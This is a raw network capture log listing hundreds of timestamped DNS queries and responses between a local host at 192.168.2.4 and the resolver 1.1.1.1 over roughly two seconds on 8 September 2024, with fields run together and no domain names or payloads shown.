                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095516920 CEST6354053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095736027 CEST6305253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.095947027 CEST4927453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096347094 CEST5827353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096541882 CEST6416953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.096942902 CEST5031053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097093105 CEST5593453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097692966 CEST6316253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.097769022 CEST6217453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.098402977 CEST5701853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.098475933 CEST5428953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.099072933 CEST5969653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.099159956 CEST5286753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.100205898 CEST4924253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.771342993 CEST53533051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.771356106 CEST53567991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.771635056 CEST53590531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776096106 CEST53527371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776108027 CEST53499901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776117086 CEST53589221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776127100 CEST53541861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776138067 CEST53609601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776149035 CEST53523861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776173115 CEST53573421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776184082 CEST53620181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776196003 CEST53534551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776209116 CEST53636661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776220083 CEST53553231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776230097 CEST53643741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776235104 CEST53568221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776238918 CEST53617751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776242971 CEST53652071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.776252985 CEST53579501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779854059 CEST53631631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779874086 CEST53531161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779887915 CEST53625491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779901981 CEST53557251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779911995 CEST53630521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779921055 CEST53518061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779936075 CEST53511531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779947042 CEST53611541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779956102 CEST53596961.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779967070 CEST53641411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779978037 CEST53547371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.779990911 CEST53636571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780005932 CEST53635401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780015945 CEST53572331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780025005 CEST53559341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780034065 CEST53590611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780042887 CEST53625021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.780052900 CEST53550051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781148911 CEST53492741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781162024 CEST53570181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781172037 CEST53503101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781181097 CEST53582731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781192064 CEST53650391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781200886 CEST53492421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781210899 CEST53542891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781219959 CEST53567751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781229973 CEST53577101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781240940 CEST53638981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781250954 CEST53574471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781261921 CEST53618181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781279087 CEST53654681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781289101 CEST53508641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781301022 CEST53536371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781311035 CEST53537581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781321049 CEST53634201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.781331062 CEST53631621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.784553051 CEST53641691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.784565926 CEST53584651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.784575939 CEST53548421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.793718100 CEST53516471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.796219110 CEST53621741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.796708107 CEST53528671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.798670053 CEST53642761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.922265053 CEST53571111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.924706936 CEST53557551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.612221956 CEST5873153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.614557028 CEST5650753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.618664980 CEST5929753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.619045973 CEST6230753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.620086908 CEST5183753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.623789072 CEST53565071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.624883890 CEST5256553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.625541925 CEST4927553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.629815102 CEST5472253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.631175041 CEST5768953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635111094 CEST6135253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635893106 CEST5636453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.635973930 CEST5204453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.636708975 CEST6335553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.638416052 CEST6217653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639072895 CEST5312453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639193058 CEST5246753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.639780045 CEST5338753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640134096 CEST5308153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640336990 CEST5848053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.640671015 CEST6277053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641108990 CEST5526753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641216993 CEST6085353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641757011 CEST5200153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.641869068 CEST5987253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642355919 CEST5219153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642445087 CEST6409453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.642975092 CEST5647453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643119097 CEST5005053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643449068 CEST6095553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.643682957 CEST6487753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.644049883 CEST4978453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.644468069 CEST6126153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.645024061 CEST6523453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.645612955 CEST5174153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.650780916 CEST6487653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.651403904 CEST5690053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.652390957 CEST5921353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.654077053 CEST5726053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.656152010 CEST5777553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.657995939 CEST5189253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.658508062 CEST6365953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.833616972 CEST53587311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.833632946 CEST53518371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.833642960 CEST53592971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.833656073 CEST53623071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.837645054 CEST53592131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.838201046 CEST53524671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.838846922 CEST53520441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.838963985 CEST53492751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.838998079 CEST53584801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839009047 CEST53530811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839020967 CEST53520011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839267015 CEST5521053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839426041 CEST53547221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839437962 CEST53517411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839503050 CEST53613521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839627028 CEST53627701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839637995 CEST53531241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839864016 CEST53497841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.839989901 CEST53572601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.840001106 CEST53609551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.840255976 CEST6362053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.840301037 CEST53612611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.840359926 CEST53577751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.841375113 CEST53636591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.841470003 CEST5723553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.842861891 CEST5503553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.844439030 CEST5352453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.844727039 CEST53621761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845016956 CEST53598721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845218897 CEST53633551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845228910 CEST53608531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845273018 CEST6473153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845980883 CEST53569001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.845993042 CEST53563641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.846054077 CEST53640941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.846064091 CEST53652341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.846163034 CEST53533871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.846493959 CEST53500501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.846777916 CEST53518921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.847378969 CEST53648771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.848531008 CEST53525651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.848936081 CEST53552101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849493980 CEST5779353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849670887 CEST6144253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.849946976 CEST5424753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.850140095 CEST5231553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.851298094 CEST5425753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.851480007 CEST53572351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.853272915 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.853691101 CEST5760853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.854404926 CEST53535241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.854628086 CEST53647311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855077982 CEST6278953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855253935 CEST5927453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855415106 CEST6220753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856053114 CEST4994053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856523037 CEST5467853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856690884 CEST5503353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856853962 CEST5474653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.858278036 CEST53542571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.859349966 CEST53636201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.859360933 CEST53542471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.860038996 CEST53576891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.860467911 CEST53521911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.860846043 CEST53648761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.861107111 CEST53552671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.863526106 CEST53576081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.865051031 CEST53592741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866065025 CEST5393253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866141081 CEST53499401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866619110 CEST53546781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866729021 CEST5659853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.867785931 CEST53523151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.868004084 CEST5452453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.869292021 CEST5441153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.871635914 CEST53622071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.872971058 CEST53627891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.873251915 CEST6137553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.877017021 CEST53565981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.877612114 CEST53545241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878528118 CEST53544111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.879596949 CEST5671953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.880023956 CEST5945553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881084919 CEST5764153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881244898 CEST53577931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881328106 CEST5792953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881691933 CEST5872053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881891966 CEST6090253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882142067 CEST53539321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882172108 CEST5025253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882776022 CEST5122253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.883016109 CEST53613751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.884644032 CEST6452553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886056900 CEST5925753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886893034 CEST5595553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887682915 CEST53547461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887728930 CEST5292053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887815952 CEST53550331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.888953924 CEST53567191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.891469002 CEST53576411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.892498970 CEST53502521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895062923 CEST53645251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895507097 CEST53592571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895889044 CEST5135553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.896624088 CEST53559551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.897150040 CEST53609021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.898397923 CEST6467653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.899646997 CEST53512221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902045012 CEST5871353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902523994 CEST5096653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903369904 CEST5434853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903477907 CEST5339553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903703928 CEST5597853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903748035 CEST53529201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903959036 CEST5826753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904577017 CEST53513551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904854059 CEST5973953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.907171011 CEST5959453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908323050 CEST5557253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908588886 CEST6273953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908992052 CEST6355153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909188986 CEST6019553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909636974 CEST5069353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909847975 CEST6514853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910372019 CEST5981053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.911515951 CEST53594551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.912704945 CEST5569353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913244009 CEST53533951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913412094 CEST53559781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913527012 CEST53579291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913770914 CEST53582671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915453911 CEST53597391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915747881 CEST53635511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.916254044 CEST53555721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.917304993 CEST53595941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.918227911 CEST53587131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.918945074 CEST53601951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.919697046 CEST53598101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.920022011 CEST53506931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.924700975 CEST53627391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925534964 CEST5552353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925791979 CEST5682353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926120996 CEST5834053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST5240353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST6023553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.928853989 CEST53556931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.929949999 CEST53646761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.932612896 CEST53509661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.933391094 CEST5783253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934166908 CEST53543481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934189081 CEST5285653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934663057 CEST5635253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.935169935 CEST53555231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.935992956 CEST53583401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.936002970 CEST53602351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.939930916 CEST53651481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.941689968 CEST53563521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.942800999 CEST53568231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.943445921 CEST53528561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.944108009 CEST53578321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.956906080 CEST53524031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.989538908 CEST53564741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.007301092 CEST53614421.1.1.1192.168.2.4
